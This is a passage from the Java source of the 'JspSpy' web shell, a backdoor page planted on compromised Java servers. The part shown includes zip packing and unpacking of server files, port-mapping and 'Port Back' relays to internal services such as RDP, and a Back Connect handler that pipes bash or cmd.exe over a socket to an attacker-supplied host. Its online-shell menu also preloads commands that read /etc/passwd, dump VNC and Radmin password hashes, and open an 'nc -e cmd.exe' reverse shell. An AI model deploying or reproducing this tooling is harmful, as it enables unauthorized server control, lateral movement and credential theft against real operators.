2840. if (pF.listFiles().length == 0) {
2841. JSession
2842. .setAttribute(MSG,
2843. "No File To Pack ! Maybe The Directory Is Empty .");
2844. response.sendRedirect(SHELL_NAME);
2845. this.reset();
2846. return;
2847. }
2848. zout = new ZipOutputStream(new BufferedOutputStream(
2849. new FileOutputStream(saveF)));
2850. zipDir(pF, base, zout);
2851. } else {
2852. zout = new ZipOutputStream(new BufferedOutputStream(
2853. new FileOutputStream(saveF)));
2854. zipFile(pF, base, zout);
2855. }
2856. zout.close();
2857. this.reset();
2858. JSession.setAttribute(MSG, "Pack File Success!");
2859. response.sendRedirect(SHELL_NAME);
2860. } catch (Exception e) {
2861. throw e;
2862. }
2863. }
2864.  
2865. public void zipDir(File f, String base, ZipOutputStream zout)
2866. throws Exception {
2867. if (f.isDirectory()) {
2868. if (this.config) {
2869. String curName = f.getAbsolutePath().replace('\\', '/');
2870. curName = curName.replaceAll("\\Q" + this.packFile + "\\E",
2871. "");
2872. if (this.exclude != null) {
2873. for (int i = 0; i < exclude.length; i++) {
2874. if (!Util.isEmpty(exclude[i])
2875. && curName.startsWith(exclude[i])) {
2876. return;
2877. }
2878. }
2879. }
2880. }
2881. File[] arr = f.listFiles();
2882. for (int i = 0; i < arr.length; i++) {
2883. File ff = arr[i];
2884. String tmpBase = base;
2885. if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/"))
2886. tmpBase += "/";
2887. zipDir(ff, tmpBase + f.getName(), zout);
2888. }
2889. } else {
2890. String tmpBase = base;
2891. if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/"))
2892. tmpBase += "/";
2893. zipFile(f, tmpBase, zout);
2894. }
2895.  
2896. }
2897.  
2898. public void zipFile(File f, String base, ZipOutputStream zout)
2899. throws Exception {
2900. if (this.config) {
2901. String ext = f.getName().substring(
2902. f.getName().lastIndexOf('.') + 1);
2903. if (this.extFilter.equals("blacklist")) {
2904. if (Util.exists(this.fileExts, ext)) {
2905. return;
2906. }
2907. } else if (this.extFilter.equals("whitelist")) {
2908. if (!Util.exists(this.fileExts, ext)) {
2909. return;
2910. }
2911. }
2912. if (!this.sizeFilter.equals("no")) {
2913. double size = f.length() / 1024;
2914. if (this.sizeFilter.equals("greaterthan")) {
2915. if (size < filesize)
2916. return;
2917. } else if (this.sizeFilter.equals("lessthan")) {
2918. if (size > filesize)
2919. return;
2920. }
2921. }
2922. }
2923. ZipEntry entry = new ZipEntry(base + f.getName());
2924. zout.putNextEntry(entry);
2925. FileInputStream fInput = new FileInputStream(f);
2926. int len = 0;
2927. byte[] buf = new byte[1024];
2928. while ((len = fInput.read(buf)) != -1) {
2929. zout.write(buf, 0, len);
2930. zout.flush();
2931. }
2932. fInput.close();
2933. }
2934. }
2935.  
2936. private static class UnPackInvoker extends DefaultInvoker {
2937. public boolean doBefore() {
2938. return false;
2939. }
2940.  
2941. public boolean doAfter() {
2942. return false;
2943. }
2944.  
2945. public void invoke(HttpServletRequest request,
2946. HttpServletResponse response, HttpSession JSession)
2947. throws Exception {
2948. try {
2949. String savepath = request.getParameter("savepath");
2950. String zipfile = request.getParameter("zipfile");
2951. if (Util.isEmpty(savepath) || Util.isEmpty(zipfile))
2952. return;
2953. File save = new File(savepath);
2954. save.mkdirs();
2955. ZipFile file = new ZipFile(new File(zipfile));
2956. Enumeration e = file.entries();
2957. while (e.hasMoreElements()) {
2958. ZipEntry en = (ZipEntry) e.nextElement();
2959. String entryPath = en.getName();
2960. int index = entryPath.lastIndexOf("/");
2961. if (index != -1)
2962. entryPath = entryPath.substring(0, index);
2963. File absEntryFile = new File(save, entryPath);
2964. if (!absEntryFile.exists()
2965. && (en.isDirectory() || en.getName().indexOf("/") != -1))
2966. absEntryFile.mkdirs();
2967. BufferedOutputStream output = null;
2968. BufferedInputStream input = null;
2969. try {
2970. output = new BufferedOutputStream(new FileOutputStream(
2971. new File(save, en.getName())));
2972. input = new BufferedInputStream(file.getInputStream(en));
2973. byte[] b = new byte[1024];
2974. int len = input.read(b);
2975. while (len != -1) {
2976. output.write(b, 0, len);
2977. len = input.read(b);
2978. }
2979. } catch (Exception ex) {
2980. } finally {
2981. try {
2982. if (output != null)
2983. output.close();
2984. if (input != null)
2985. input.close();
2986. } catch (Exception ex1) {
2987. }
2988. }
2989. }
2990. file.close();
2991. JSession.setAttribute(MSG, "UnPack File Success!");
2992. response.sendRedirect(SHELL_NAME);
2993. } catch (Exception e) {
2994.  
2995. throw e;
2996. }
2997. }
2998. }
2999.  
3000. //VMapPort
3001. private static class VmpInvoker extends DefaultInvoker {
3002. public void invoke(HttpServletRequest request,
3003. HttpServletResponse response, HttpSession JSession)
3004. throws Exception {
3005. try {
3006. PrintWriter out = response.getWriter();
3007. Object localIP = JSession.getAttribute("localIP");
3008. Object localPort = JSession.getAttribute("localPort");
3009. Object remoteIP = JSession.getAttribute("remoteIP");
3010. Object remotePort = JSession.getAttribute("remotePort");
3011. Object done = JSession.getAttribute("done");
3012.  
3013. JSession.removeAttribute("localIP");
3014. JSession.removeAttribute("localPort");
3015. JSession.removeAttribute("remoteIP");
3016. JSession.removeAttribute("remotePort");
3017. JSession.removeAttribute("done");
3018.  
3019. if (Util.isEmpty(localIP))
3020. localIP = InetAddress.getLocalHost().getHostAddress();
3021. if (Util.isEmpty(localPort))
3022. localPort = "3389";
3023. if (Util.isEmpty(remoteIP))
3024. remoteIP = "www.baidu.com";
3025. if (Util.isEmpty(remotePort))
3026. remotePort = "80";
3027. if (!Util.isEmpty(done))
3028. Util.outMsg(out, done.toString());
3029.  
3030. out
3031. .println("<form action=\""
3032. + SHELL_NAME
3033. + "\" method=\"post\">"
3034. + "<input type=\"hidden\" name=\"o\" value=\"mapPort\">"
3035. + " <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3036. + " <tr>"
3037. + " <td><h2 id=\"Bin_H2_Title\">PortMap &gt;&gt;<hr/></h2>"
3038. + " <div id=\"hOWTm\">"
3039. + " <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"
3040. + " <tr align=\"center\">"
3041. + " <td style=\"width:5%\"></td>"
3042. + " <td style=\"width:20%\" align=\"left\"><br/>Local Ip :"
3043. + " <input name=\"localIP\" id=\"localIP\" type=\"text\" class=\"input\" size=\"20\" value=\""
3044. + localIP
3045. + "\" />"
3046. + " </td>"
3047. + " <td style=\"width:20%\" align=\"left\">Local Port :"
3048. + " <input name=\"localPort\" id=\"localPort\" type=\"text\" class=\"input\" size=\"20\" value=\""
3049. + localPort
3050. + "\" /></td>"
3051. + " <td style=\"width:20%\" align=\"left\">Remote Ip :"
3052. + " <input name=\"remoteIP\" id=\"remoteIP\" type=\"text\" class=\"input\" size=\"20\" value=\""
3053. + remoteIP
3054. + "\" /></td>"
3055. + " <td style=\"width:20%\" align=\"left\">Remote Port :"
3056. + " <input name=\"remotePort\" id=\"remotePort\" type=\"text\" class=\"input\" size=\"20\" value=\""
3057. + remotePort
3058. + "\" /></td>"
3059. + " </tr>"
3060. + " <tr align=\"center\">"
3061. + " <td colspan=\"5\"><br/>"
3062. + " <input type=\"submit\" name=\"FJE\" value=\"MapPort\" id=\"FJE\" class=\"bt\" />"
3063. + " <input type=\"button\" name=\"giX\" value=\"ClearAll\" id=\"giX\" onClick=\"location.href='"
3064. + SHELL_NAME + "?o=smp'\" class=\"bt\" />"
3065. + " </td>" + " </tr>" + " </table>"
3066. + " </div>" + "</td>" + "</tr>" + "</table>"
3067. + "</form>");
3068. String targetIP = request.getParameter("targetIP");
3069. String targetPort = request.getParameter("targetPort");
3070. String yourIP = request.getParameter("yourIP");
3071. String yourPort = request.getParameter("yourPort");
3072. if (Util.isEmpty(targetIP))
3073. targetIP = "127.0.0.1";
3074. if (Util.isEmpty(targetPort))
3075. targetPort = "3389";
3076. if (Util.isEmpty(yourIP))
3077. yourIP = request.getRemoteAddr();
3078. if (Util.isEmpty(yourPort))
3079. yourPort = "1234";
3080. out
3081. .println("<form action=\""
3082. + SHELL_NAME
3083. + "\" method=\"post\">"
3084. + "<input type=\"hidden\" name=\"o\" value=\"portBack\">"
3085. + " <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3086. + " <tr>"
3087. + " <td><h2 id=\"Bin_H2_Title\">Port Back &gt;&gt;<hr/></h2>"
3088. + " <div id=\"hOWTm\">"
3089. + " <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"
3090. + " <tr align=\"center\">"
3091. + " <td style=\"width:5%\"></td>"
3092. + " <td style=\"width:20%\" align=\"left\"><br/>Target Ip :"
3093. + " <input name=\"targetIP\" id=\"targetIP\" type=\"text\" class=\"input\" size=\"20\" value=\""
3094. + targetIP
3095. + "\" />"
3096. + " </td>"
3097. + " <td style=\"width:20%\" align=\"left\">Target Port :"
3098. + " <input name=\"targetPort\" id=\"targetPort\" type=\"text\" class=\"input\" size=\"20\" value=\""
3099. + targetPort
3100. + "\" /></td>"
3101. + " <td style=\"width:20%\" align=\"left\">Your Ip :"
3102. + " <input name=\"yourIP\" id=\"yourIP\" type=\"text\" class=\"input\" size=\"20\" value=\""
3103. + yourIP
3104. + "\" /></td>"
3105. + " <td style=\"width:20%\" align=\"left\">Your Port :"
3106. + " <input name=\"yourPort\" id=\"yourPort\" type=\"text\" class=\"input\" size=\"20\" value=\""
3107. + yourPort
3108. + "\" /></td>"
3109. + " </tr>"
3110. + " <tr align=\"center\">"
3111. + " <td colspan=\"5\"><br/>"
3112. + " <input type=\"submit\" name=\"FJE\" value=\"Port Back\" id=\"FJE\" class=\"bt\" />"
3113. + " </td>" + " </tr>" + " </table>"
3114. + " </div>" + "</td>" + "</tr>" + "</table>"
3115. + "</form>");
3116. } catch (Exception e) {
3117.  
3118. throw e;
3119. }
3120. }
3121. }
3122.  
3123. //StopMapPort
3124. private static class SmpInvoker extends DefaultInvoker {
3125. public boolean doAfter() {
3126. return true;
3127. }
3128.  
3129. public boolean doBefore() {
3130. return true;
3131. }
3132.  
3133. public void invoke(HttpServletRequest request,
3134. HttpServletResponse response, HttpSession JSession)
3135. throws Exception {
3136. try {
3137. Object obj = JSession.getAttribute(PORT_MAP);
3138. if (obj != null) {
3139. ServerSocket server = (ServerSocket) JSession
3140. .getAttribute(PORT_MAP);
3141. server.close();
3142. }
3143. JSession.setAttribute("done", "Stop Success!");
3144. ((Invoker) ins.get("vmp")).invoke(request, response, JSession);
3145. } catch (Exception e) {
3146.  
3147. throw e;
3148. }
3149. }
3150. }
3151.  
3152. //PortBack
3153. private static class PortBackInvoker extends DefaultInvoker {
3154. public boolean doAfter() {
3155. return true;
3156. }
3157.  
3158. public boolean doBefore() {
3159. return true;
3160. }
3161.  
3162. public void invoke(HttpServletRequest request,
3163. HttpServletResponse response, HttpSession JSession)
3164. throws Exception {
3165. try {
3166. String targetIP = request.getParameter("targetIP");
3167. String targetPort = request.getParameter("targetPort");
3168. String yourIP = request.getParameter("yourIP");
3169. String yourPort = request.getParameter("yourPort");
3170. Socket yourS = new Socket();
3171. yourS.connect(new InetSocketAddress(yourIP, Integer
3172. .parseInt(yourPort)));
3173. Socket targetS = new Socket();
3174. targetS.connect(new InetSocketAddress(targetIP, Integer
3175. .parseInt(targetPort)));
3176. StreamConnector.readFromLocal(new DataInputStream(targetS
3177. .getInputStream()), new DataOutputStream(yourS
3178. .getOutputStream()));
3179. StreamConnector.readFromRemote(targetS, yourS,
3180. new DataInputStream(yourS.getInputStream()),
3181. new DataOutputStream(targetS.getOutputStream()));
3182. JSession.setAttribute("done", "Port Back Success !");
3183. ((Invoker) ins.get("vmp")).invoke(request, response, JSession);
3184. } catch (Exception e) {
3185.  
3186. throw e;
3187. }
3188. }
3189. }
3190.  
3191. private static class MapPortInvoker extends DefaultInvoker {
3192. public boolean doBefore() {
3193. return false;
3194. }
3195.  
3196. public boolean doAfter() {
3197. return false;
3198. }
3199.  
3200. public void invoke(HttpServletRequest request,
3201. HttpServletResponse response, HttpSession JSession)
3202. throws Exception {
3203. try {
3204. PrintWriter out = response.getWriter();
3205. String localIP = request.getParameter("localIP");
3206. String localPort = request.getParameter("localPort");
3207. final String remoteIP = request.getParameter("remoteIP");
3208. final String remotePort = request.getParameter("remotePort");
3209. if (Util.isEmpty(localIP) || Util.isEmpty(localPort)
3210. || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort))
3211. return;
3212. Object obj = JSession.getAttribute(PORT_MAP);
3213. if (obj != null) {
3214. ServerSocket s = (ServerSocket) obj;
3215. s.close();
3216. }
3217. final ServerSocket server = new ServerSocket();
3218. server.bind(new InetSocketAddress(localIP, Integer
3219. .parseInt(localPort)));
3220. JSession.setAttribute(PORT_MAP, server);
3221. new Thread(new Runnable() {
3222. public void run() {
3223. while (true) {
3224. Socket soc = null;
3225. Socket remoteSoc = null;
3226. DataInputStream remoteIn = null;
3227. DataOutputStream remoteOut = null;
3228. DataInputStream localIn = null;
3229. DataOutputStream localOut = null;
3230. try {
3231. soc = server.accept();
3232. remoteSoc = new Socket();
3233. remoteSoc
3234. .connect(new InetSocketAddress(
3235. remoteIP, Integer
3236. .parseInt(remotePort)));
3237. remoteIn = new DataInputStream(remoteSoc
3238. .getInputStream());
3239. remoteOut = new DataOutputStream(remoteSoc
3240. .getOutputStream());
3241. localIn = new DataInputStream(soc
3242. .getInputStream());
3243. localOut = new DataOutputStream(soc
3244. .getOutputStream());
3245. StreamConnector.readFromLocal(localIn,
3246. remoteOut);
3247. StreamConnector.readFromRemote(soc, remoteSoc,
3248. remoteIn, localOut);
3249. } catch (Exception ex) {
3250. break;
3251. }
3252. }
3253. }
3254.  
3255. }).start();
3256. JSession.setAttribute("done", "Map Port Success!");
3257. JSession.setAttribute("localIP", localIP);
3258. JSession.setAttribute("localPort", localPort);
3259. JSession.setAttribute("remoteIP", remoteIP);
3260. JSession.setAttribute("remotePort", remotePort);
3261. JSession.setAttribute(SESSION_O, "vmp");
3262. response.sendRedirect(SHELL_NAME);
3263. } catch (Exception e) {
3264.  
3265. throw e;
3266. }
3267. }
3268. }
3269.  
3270. //VBackConnect
3271. private static class VbcInvoker extends DefaultInvoker {
3272. public void invoke(HttpServletRequest request,
3273. HttpServletResponse response, HttpSession JSession)
3274. throws Exception {
3275. try {
3276. PrintWriter out = response.getWriter();
3277. Object ip = JSession.getAttribute("ip");
3278. Object port = JSession.getAttribute("port");
3279. Object program = JSession.getAttribute("program");
3280. Object done = JSession.getAttribute("done");
3281. JSession.removeAttribute("ip");
3282. JSession.removeAttribute("port");
3283. JSession.removeAttribute("program");
3284. JSession.removeAttribute("done");
3285. if (Util.isEmpty(ip))
3286. ip = request.getRemoteAddr();
3287. if (Util.isEmpty(port) || !Util.isInteger(port.toString()))
3288. port = "1234";
3289. if (Util.isEmpty(program)) {
3290. if (ISLINUX)
3291. program = "/bin/bash";
3292. else
3293. program = "cmd.exe";
3294. }
3295.  
3296. if (!Util.isEmpty(done))
3297. Util.outMsg(out, done.toString());
3298. out
3299. .println("<form action=\""
3300. + SHELL_NAME
3301. + "\" method=\"post\">"
3302. + "<input type=\"hidden\" name=\"o\" value=\"backConnect\">"
3303. + " <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3304. + " <tr>"
3305. + " <td><h2 id=\"Bin_H2_Title\">Back Connect &gt;&gt;</h2>"
3306. + " <div id=\"hOWTm\">"
3307. + " <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"
3308. + " <tr align=\"center\">"
3309. + " <td style=\"width:5%\"></td>"
3310. + " <td align=\"center\">Your Ip :"
3311. + " <input name=\"ip\" id=\"ip\" type=\"text\" class=\"input\" size=\"20\" value=\""
3312. + ip
3313. + "\" />"
3314. + " Your Port :"
3315. + " <input name=\"port\" id=\"port\" type=\"text\" class=\"input\" size=\"20\" value=\""
3316. + port
3317. + "\" />Program To Back :"
3318. + " <input name=\"program\" id=\"program\" type=\"text\" value=\""
3319. + program
3320. + "\" class=\"input\" size=\"20\" value=\"d\" /></td>"
3321. + " </tr>"
3322. + " <tr align=\"center\">"
3323. + " <td colspan=\"2\"><br/>"
3324. + " <input type=\"submit\" name=\"FJE\" value=\"Connect\" id=\"FJE\" class=\"bt\" />"
3325. + " </td>" + " </tr>" + " </table>"
3326. + " </div>" + "</td>" + "</tr>" + "</table>"
3327. + "</form>");
3328. } catch (Exception e) {
3329.  
3330. throw e;
3331. }
3332. }
3333. }
3334.  
3335. private static class BackConnectInvoker extends DefaultInvoker {
3336. public boolean doAfter() {
3337. return false;
3338. }
3339.  
3340. public boolean doBefore() {
3341. return false;
3342. }
3343.  
3344. public void invoke(HttpServletRequest request,
3345. HttpServletResponse response, HttpSession JSession)
3346. throws Exception {
3347. try {
3348. String ip = request.getParameter("ip");
3349. String port = request.getParameter("port");
3350. String program = request.getParameter("program");
3351. if (Util.isEmpty(ip) || Util.isEmpty(program)
3352. || !Util.isInteger(port))
3353. return;
3354. Socket socket = new Socket(ip, Integer.parseInt(port));
3355. Process process = Runtime.getRuntime().exec(program);
3356. (new StreamConnector(process.getInputStream(), socket
3357. .getOutputStream())).start();
3358. (new StreamConnector(process.getErrorStream(), socket
3359. .getOutputStream())).start();
3360. (new StreamConnector(socket.getInputStream(), process
3361. .getOutputStream())).start();
3362. JSession.setAttribute("done", "Back Connect Success!");
3363. JSession.setAttribute("ip", ip);
3364. JSession.setAttribute("port", port);
3365. JSession.setAttribute("program", program);
3366. JSession.setAttribute(SESSION_O, "vbc");
3367. response.sendRedirect(SHELL_NAME);
3368. } catch (Exception e) {
3369.  
3370. throw e;
3371. }
3372. }
3373. }
3374.  
3375. private static class JspEnvInvoker extends DefaultInvoker {
3376. public void invoke(HttpServletRequest request,
3377. HttpServletResponse response, HttpSession JSession)
3378. throws Exception {
3379. try {
3380. PrintWriter out = response.getWriter();
3381. out
3382. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3383. + " <tr>"
3384. + " <td><h2 id=\"Ninty_H2_Title\">System Properties &gt;&gt;</h2>"
3385. + " <div id=\"ghaB\">"
3386. + " <hr/>"
3387. + " <ul id=\"Ninty_Ul_Sys\" class=\"info\">");
3388. Properties pro = System.getProperties();
3389. Enumeration names = pro.propertyNames();
3390. while (names.hasMoreElements()) {
3391. String name = (String) names.nextElement();
3392. out.println("<li><u>" + Util.htmlEncode(name) + " : </u>"
3393. + Util.htmlEncode(pro.getProperty(name)) + "</li>");
3394. }
3395. out
3396. .println("</ul><h2 id=\"Ninty_H2_Mac\">System Environment &gt;&gt;</h2><hr/><ul id=\"Ninty_Ul_Sys\" class=\"info\">");
3397. /*
3398. Map envs = System.getenv();
3399. Set<Map.Entry<String,String>> entrySet = envs.entrySet();
3400. for (Map.Entry<String,String> en:entrySet) {
3401. out.println("<li><u>"+Util.htmlEncode(en.getKey())+" : </u>"+Util.htmlEncode(en.getValue())+"</li>");
3402. }*/
3403. out
3404. .println("</ul></div></td>" + " </tr>"
3405. + " </table>");
3406. } catch (Exception e) {
3407.  
3408. throw e;
3409. }
3410. }
3411. }
3412.  
3413. private static class ReflectInvoker extends DefaultInvoker {
3414. public void invoke(HttpServletRequest request,
3415. HttpServletResponse response, HttpSession JSession)
3416. throws Exception {
3417. try {
3418. PrintWriter out = response.getWriter();
3419. String c = request.getParameter("Class");
3420. Class cls = null;
3421. try {
3422. if (!Util.isEmpty(c))
3423. cls = Class.forName(c);
3424. } catch (ClassNotFoundException ex) {
3425. Util.outMsg(out, "<span style='color:red'>Class " + c
3426. + " Not Found ! </span>");
3427. }
3428. out
3429. .println("<form action=\""
3430. + SHELL_NAME
3431. + "\" id='refForm' method=\"post\">"
3432. + " <input type=\"hidden\" name=\"o\" value=\"reflect\">"
3433. + " <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3434. + " <tr>"
3435. + " <td><h2 id=\"Bin_H2_Title\">Java Reflect &gt;&gt;</h2>"
3436. + " <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"
3437. + " <tr>"
3438. + " <td>Class Name : <input name=\"Class\" type=\"text\" class=\"input\" value=\""
3439. + (Util.isEmpty(c) ? "java.lang.Object" : c)
3440. + "\" size=\"60\"/> "
3441. + " <input type=\"submit\" class=\"bt\" value=\"Reflect\"/></td>"
3442. + " </tr>" + " "
3443. + " </table>" + " </td>"
3444. + " </tr>" + " </table>" + "</form>");
3445.  
3446. if (cls != null) {
3447. StringBuffer sb = new StringBuffer();
3448. if (cls.getPackage() != null)
3449. sb.append("package " + cls.getPackage().getName()
3450. + ";\n");
3451. String n = null;
3452. if (cls.isInterface())
3453. n = "";
3454. //else if (cls.isEnum())
3455. // n = "enum";
3456. else
3457. n = "class";
3458. sb.append(Modifier.toString(cls.getModifiers()) + " " + n
3459. + " " + cls.getName() + "\n");
3460. if (cls.getSuperclass() != null)
3461. sb
3462. .append("\textends <a href=\"javascript:document.forms['refForm'].elements['Class'].value='"
3463. + cls.getSuperclass().getName()
3464. + "';document.forms['refForm'].submit()\" style='color:red;'>"
3465. + cls.getSuperclass().getName()
3466. + "</a>\n");
3467. if (cls.getInterfaces() != null
3468. && cls.getInterfaces().length != 0) {
3469. Class[] faces = cls.getInterfaces();
3470. sb.append("\t implements ");
3471. for (int i = 0; i < faces.length; i++) {
3472. sb
3473. .append("<a href=\"javascript:document.forms['refForm'].elements['Class'].value='"
3474. + faces[i].getName()
3475. + "';document.forms['refForm'].submit()\" style='color:red'>"
3476. + faces[i].getName() + "</a>");
3477. if (i != faces.length - 1) {
3478. sb.append(",");
3479. }
3480. }
3481. }
3482. sb.append("{\n\t\n");
3483. sb.append("\t//constructors..\n");
3484. Constructor[] cs = cls.getConstructors();
3485. for (int i = 0; i < cs.length; i++) {
3486. Constructor cc = cs[i];
3487. sb.append("\t" + cc + ";\n");
3488. }
3489. sb.append("\n\t//fields\n");
3490. Field[] fs = cls.getDeclaredFields();
3491. for (int i = 0; i < fs.length; i++) {
3492. Field f = fs[i];
3493. sb.append("\t" + f.toString() + ";");
3494. if (Modifier.toString(f.getModifiers()).indexOf(
3495. "static") != -1) {
3496. sb.append("\t//value is : ");
3497. f.setAccessible(true);
3498. Object obj = f.get(null);
3499. sb.append("<span style='color:red'>");
3500. if (obj != null)
3501. sb.append(obj.toString());
3502. else
3503. sb.append("NULL");
3504.  
3505. sb.append("</span>");
3506. }
3507. sb.append("\n");
3508. }
3509.  
3510. sb.append("\n\t//methods\n");
3511. Method[] ms = cls.getDeclaredMethods();
3512. for (int i = 0; i < ms.length; i++) {
3513. Method m = ms[i];
3514. sb.append("\t" + m.toString() + ";\n");
3515. }
3516. sb.append("}\n");
3517. String m = "<span style='font-weight:normal'>"
3518. + Util.highLight(sb.toString()).replaceAll("\t",
3519. "&nbsp;&nbsp;&nbsp;&nbsp;").replaceAll(
3520. "\n", "<br/>") + "</span>";
3521. Util.outMsg(out, m, "left");
3522. }
3523. } catch (Exception e) {
3524. throw e;
3525. }
3526. }
3527. }
3528.  
3529. private static class TopInvoker extends DefaultInvoker {
3530. public void invoke(HttpServletRequest request,
3531. HttpServletResponse response, HttpSession JSession)
3532. throws Exception {
3533. try {
3534. PrintWriter out = response.getWriter();
3535. out
3536. .println("<form action=\""
3537. + SHELL_NAME
3538. + "\" method=\"post\" name=\"doForm\"></form>"
3539. + "<table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">"
3540. + " <tr class=\"head\">"
3541. + " <td><span style=\"float:right;\">JspSpy Ver: 2010</span>"
3542. + request.getHeader("host")
3543. + " (<span id='ip'>"
3544. + InetAddress.getLocalHost().getHostAddress()
3545. + "</span>) | <a href=\"javascript:if (!window.clipboardData){alert('only support IE!');}else{void(window.clipboardData.setData('Text', document.getElementById('ip').innerText));alert('ok')}\">copy</a></td>"
3546. + " </tr>"
3547. + " <tr class=\"alt1\">"
3548. + " <td><a href=\"javascript:doPost({o:'logout'});\">Logout</a> | "
3549. + " <a href=\"javascript:doPost({o:'fileList'});\">File Manager</a> | "
3550. + " <a href=\"javascript:doPost({o:'vConn'});\">DataBase Manager</a> | "
3551. + " <a href=\"javascript:doPost({o:'vs'});\">Execute Command</a> | "
3552. + " <a href=\"javascript:doPost({o:'vso'});\">Shell OnLine</a> | "
3553. + " <a href=\"javascript:doPost({o:'vbc'});\">Back Connect</a> | "
3554. + " <a href=\"javascript:doPost({o:'reflect'});\">Java Reflect</a> | "
3555. + " <!--<a href=\"javascript:alert('not support yet');\">Http Proxy</a> | -->"
3556. + " <a href=\"javascript:doPost({o:'ev'});\">Eval Java Code</a> | "
3557. + " <a href=\"javascript:doPost({o:'vPortScan'});;\">Port Scan</a> | "
3558. + " <a href=\"javascript:doPost({o:'vd'});\">Download Remote File</a> | "
3559. + " <a href=\"javascript:;doPost({o:'clipboard'});\">ClipBoard</a> | "
3560. + " <a href=\"javascript:doPost({o:'vmp'});\">Port Map</a> | "
3561. + " <a href=\"javascript:doPost({o:'vother'});\">Others</a> | "
3562. + " <a href=\"javascript:doPost({o:'jspEnv'});\">JSP Env</a> "
3563. + " </tr>" + "</table>");
3564. if (JSession.getAttribute(MSG) != null) {
3565. Util.outMsg(out, JSession.getAttribute(MSG).toString());
3566. JSession.removeAttribute(MSG);
3567. }
3568. if (JSession.getAttribute(ENTER_MSG) != null) {
3569. String outEntry = request.getParameter("outentry");
3570. if (Util.isEmpty(outEntry) || !outEntry.equals("true"))
3571. Util.outMsg(out, JSession.getAttribute(ENTER_MSG)
3572. .toString());
3573. }
3574. } catch (Exception e) {
3575.  
3576. throw e;
3577. }
3578. }
3579. }
3580.  
3581. private static class VOnLineShellInvoker extends DefaultInvoker {
3582. public void invoke(HttpServletRequest request,
3583. HttpServletResponse response, HttpSession JSession)
3584. throws Exception {
3585. try {
3586. PrintWriter out = response.getWriter();
3587. out
3588. .println("<script>"
3589. + " function $(id) {"
3590. + " return document.getElementById(id);"
3591. + " }"
3592. + " var ie = window.navigator.userAgent.toLowerCase().indexOf(\"msie\") != -1;"
3593. + " window.onload = function(){"
3594. + " setInterval(function(){"
3595. + " if ($(\"autoscroll\").checked)"
3596. + " {"
3597. + " var f = window.frames[\"echo\"];"
3598. + " if (f && f.document && f.document.body)"
3599. + " {"
3600. + " if (!ie)"
3601. + " {"
3602. + " if (f.document.body.offsetHeight)"
3603. + " {"
3604. + " f.scrollTo(0,parseInt(f.document.body.offsetHeight)+1);"
3605. + " }"
3606. + " } else {"
3607. + " f.scrollTo(0,parseInt(f.document.body.scrollHeight)+1);"
3608. + " }" + " }" + " }"
3609. + " },500);" + " }" + " </script>");
3610. out
3611. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3612. + " <tr>" + " <td>");
3613. out.println("<h2>Shell OnLine &raquo;</h2><br/>");
3614. out
3615. .println("<form action=\""
3616. + SHELL_NAME
3617. + "\" method=\"post\" target=\"echo\" onsubmit=\"$('cmd').focus()\">"
3618. + " <input type=\"submit\" value=\" start \" class=\"bt\">"
3619. + " <input type=\"text\" name=\"exe\" style=\"width:300px\" class=\"input\" value=\""
3620. + (ISLINUX ? "/bin/bash"
3621. : "c:\\windows\\system32\\cmd.exe")
3622. + "\"/>"
3623. + " <input type=\"hidden\" name=\"o\" value=\"online\"/><input type=\"hidden\" name=\"type\" value=\"start\"/><span class=\"tip\">Notice ! If You Are Using IE , You Must Input Some Commands First After You Start Or You Will Not See The Echo</span>"
3624. + " </form>"
3625. + " <hr/>"
3626. + " <iframe class=\"secho\" name=\"echo\" src=\"\">"
3627. + " </iframe>"
3628. + " <form action=\""
3629. + SHELL_NAME
3630. + "\" method=\"post\" onsubmit=\"this.submit();$('cmd').value='';return false;\" target=\"asyn\">"
3631. + " <input type=\"text\" id=\"cmd\" name=\"cmd\" class=\"input\" style=\"width:75%\">"
3632. + " <input name=\"o\" id=\"o\" type=\"hidden\" value=\"online\"/><input type=\"hidden\" id=\"ddtype\" name=\"type\" value=\"ecmd\"/>"
3633. + " <select onchange=\"$('cmd').value = this.value;$('cmd').focus()\">"
3634. + " <option value=\"\" selected> </option>"
3635. + " <option value=\"uname -a\">uname -a</option>"
3636. + " <option value=\"cat /etc/issue\">issue</option>"
3637. + " <option value=\"cat /etc/passwd\">passwd</option>"
3638. + " <option value=\"netstat -an\">netstat -an</option>"
3639. + " <option value=\"net user\">net user</option>"
3640. + " <option value=\"tasklist\">tasklist</option>"
3641. + " <option value=\"tasklist /svc\">tasklist /svc</option>"
3642. + " <option value=\"net start\">net start</option>"
3643. + " <option value=\"net stop policyagent /yes\">net stop</option>"
3644. + " <option value=\"nbtstat -A IP\">nbtstat -A</option>"
3645. + " <option value='reg query \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v \"PortNumber\"'>reg query</option>"
3646. + " <option value='reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\RAdmin\\v2.0\\Server\\Parameters\\\" /v \"Parameter\"'>radmin hash</option>"
3647. + " <option value='reg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\RealVNC\\WinVNC4\" /v \"password\"'>vnc hash</option>"
3648. + " <option value=\"nc -e cmd.exe 192.168.230.1 4444\">nc</option>"
3649. + " <option value=\"lcx -slave 192.168.230.1 4444 127.0.0.1 3389\">lcx</option>"
3650. + " <option value=\"systeminfo\">systeminfo</option>"
3651. + " <option value=\"net localgroup\">view groups</option>"
3652. + " <option value=\"net localgroup administrators\">view admins</option>"
3653. + " </select>"
3654. + " <input type=\"checkbox\" checked=\"checked\" id=\"autoscroll\">Auto Scroll"
